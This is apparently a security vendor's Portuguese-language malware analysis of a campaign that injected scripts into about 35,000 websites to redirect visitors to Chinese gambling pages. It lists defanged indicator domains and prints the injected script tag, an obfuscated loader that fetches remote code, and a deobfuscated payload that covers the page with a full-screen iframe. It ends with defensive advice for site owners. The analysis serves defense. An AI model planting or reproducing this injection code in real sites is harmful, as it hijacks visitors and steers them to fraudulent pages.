Uma nova campanha de malware comprometeu mais de 35.000 sites, injetando um script malicioso a partir dos domínios listados abaixo. Assim que o script é carregado, ele sequestra completamente a janela do navegador do usuário — geralmente redirecionando-o para páginas que promovem uma plataforma de jogos de azar (ou cassino) em idioma chinês.
O ataque parece ter como alvo ou origem regiões onde o mandarim é comum, e as páginas de destino finais apresentam conteúdo de jogos de azar sob a marca "Kaiyun".
Lista de Indicadores de Comprometimento (IoCs):
- Mlbetjs[.]com (mais de 18 mil sites infectados) - link publicwww
- Ptfafajs[.]com (mais de 9 mil sites infectados) - link publicwww
- Zuizhongjs[.]com (mais de 4,8 mil sites infectados) - link publicwww
- Jbwzzzjs[.]com (mais de 2,9 mil sites infectados) - link publicwww
- Jpbkte[.]com (mais de 30 sites infectados) - link publicwww
Você encontrou redirecionamentos semelhantes ou novos IoCs? Compartilhe-os ou entre em contato com nossa equipe. Ao reunir dados, conseguimos identificar e desmantelar ameaças em evolução com mais rapidez.
Todos os sites listados acima exibem a seguinte mensagem:
Tradução:
Parabéns, o site foi criado com sucesso! Este é o index.html padrão. Esta página é gerada automaticamente pelo sistema. Esta página é o index.html no diretório raiz do FTP Você pode modificar, excluir ou substituir esta página Para informações relacionadas ao FTP, acesse "Painel do Sistema > FTP" para visualizar
O Processo de Infecção
Como exemplo, analisamos o zuizhongjs[.]com.
Os atacantes inserem uma tag <script> de uma linha referenciando zuizhongjs[.]com diretamente nos arquivos do site (por exemplo, no <head> ou no final do <body>). Veja abaixo um exemplo do código injetado:
<script language="javascript"
src="https://www.zuizhongjs[.]com/js/24/12/7/ky1.js"
type="text/javascript"></script>Loader Ofuscado
Dentro do arquivo carregado, os atacantes utilizam um trecho de JavaScript que escreve outro elemento de script para buscar malware adicional:
;(function(o, q, f, e, w, j) {
w = q.createElement(f);
j = q.getElementsByTagName(f)[0];
w.async = 1;
w.src = e;
j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);O código acima utiliza concatenação de strings e eval() para ocultar seu verdadeiro propósito. Ele injeta uma nova tag <script>, carregando o payload principal a partir do mesmo domínio malicioso.
Payload Principal (Desofuscado)
Abaixo está uma versão simplificada do script principal, mostrando as funcionalidades-chave:
function isMobile() {
return navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i) ? true : false;
}
var url = "https://www.zuizhongjs[.]com/go/kaiyun1/ky.html";
function getIosVersion() {
var str = navigator.userAgent.toLowerCase();
var ver = str.match(/cpu iphone os (.*?) like mac os/);
return ver ? parseInt(ver[1].slice(0,2)) : false;
}
var u = navigator.userAgent;
var isIOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
function randomNum(minNum, maxNum) {
return parseInt(Math.random() * (maxNum - minNum + 1) + minNum, 10);
}
const time = randomNum(500, 1000);
console.log(time);
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden; clear:both;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + url + '" frameborder="0" style="border:0;width: 100%; text-align: center; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');
Principais Conclusões
- Detecção de Dispositivo
- Utiliza funções como
isMobile(),getIosVersion(),isIOSpara adaptar o payload a dispositivos ou sistemas operacionais específicos.
- Atraso Aleatório
randomNum(500, 1000)introduz um atraso de 500 a 1000 ms para evitar varreduras automatizadas ou detecção em sandbox.
- Sequestro em Tela Cheia
- O código injeta um elemento que cobre completamente a página, substituindo todo o conteúdo original.
- URL Ofuscada
- A
urlinicial pode ser ainda mais ofuscada (por exemplo, via escapes Unicode). Atualmente, aponta para https://www.zuizhongjs[.]com/go/kaiyun1/ky.html.
- Redirecionamento Final
- Após a execução completa, alguns usuários são enviados para um segundo domínio — por exemplo, https://www.p11vt3[.]vip:6002/register50154?i_code=21708264 — típico de fluxos de cadastro fraudulentos ou de phishing.
Os atacantes parecem direcionar o tráfego para um site de jogos de azar em idioma chinês (ou cassino) que opera sob a marca "Kaiyun".
Durante nossa análise, identificamos algumas variantes em sites infectados:
Alguns IPs ou regiões visualizam uma página informando que o acesso está bloqueado. Ela instrui os usuários a entrar em contato por e-mail ou com o "suporte online", possivelmente para filtrar pesquisadores de segurança ou reduzir tráfego indesejado.
Possível Conexão com o Exploit do Megalayer
Nossa análise sugere que esta campanha pode estar relacionada ao exploit do Megalayer, conhecido pela distribuição de malware em idioma chinês. Os indícios incluem:
- Localização: Textos em chinês, referências a públicos de língua mandarim.
- Padrões de Domínio: A estrutura de zuizhongjs[.]com, além de múltiplos domínios de redirecionamento usando .vip ou outros TLDs favorecidos por determinados agentes de ameaça.
- Táticas de Ofuscação: URLs com escapes Unicode, atrasos baseados em código, entre outros.
Como Proteger o Seu Site
O proxy do cside analisa o payload de cada requisição de script em tempo real. Caso um script tente carregar uma versão maliciosa, nós o identificamos, bloqueamos o carregamento e alertamos sua equipe.
O cside já bloqueou este ataque para nossos usuários, oferecendo análise em tempo real e defesa proativa. Se você suspeita que seu site está infectado, entre em contato imediatamente com seu fornecedor de segurança ou provedor de hospedagem.
- Audite o Código-Fonte
- Verifique seus arquivos HTML, arquivos de tema e templates do CMS em busca de tags não autorizadas referenciando zuizhongjs[.]com ou domínios igualmente suspeitos.
- Bloqueie Domínios Maliciosos
- Use regras de firewall ou bloqueio em nível de DNS para: zuizhongjs[.]com
- p11vt3[.]vip (e subdomínios associados)
- Monitore os logs em busca de requisições de saída inesperadas para esses domínios.
- Verifique Modificações Não Autorizadas
- Revise regularmente sua conta de hospedagem ou utilize um verificador de integridade de arquivos.
- Qualquer alteração inexplicável em arquivos principais pode indicar um backdoor ou ponto de injeção.
- Restrinja scripts apenas a domínios confiáveis com uma CSP bem definida.
- Impeça o carregamento de scripts inline e de fontes desconhecidas.
- Varreduras Frequentes do Site
A campanha de malware ZuizhongJS demonstra como um único script injetado pode sequestrar milhares de sites, redirecionando usuários desavisados para portais de jogos de azar em idioma chinês. A presença de logotipos conhecidos de futebol e referências esportivas sugere uma tentativa de aparentar legitimidade, mas toda a operação parece não licenciada ou abertamente fraudulenta.
- Proprietários de Sites: Remova quaisquer scripts injetados, bloqueie domínios maliciosos e reforce sua configuração de segurança para evitar reinfecção.
- Pesquisadores de Segurança: É necessária uma investigação mais aprofundada para confirmar a ligação com o Megalayer, identificar os métodos exatos de infiltração (por exemplo, plugins de CMS vulneráveis, credenciais roubadas) e rastrear domínios adicionais.
O cside detectou e bloqueou este ataque com sucesso. Se você está preocupado com possíveis infecções, nosso sistema pode oferecer análise em tempo real e defesa proativa.
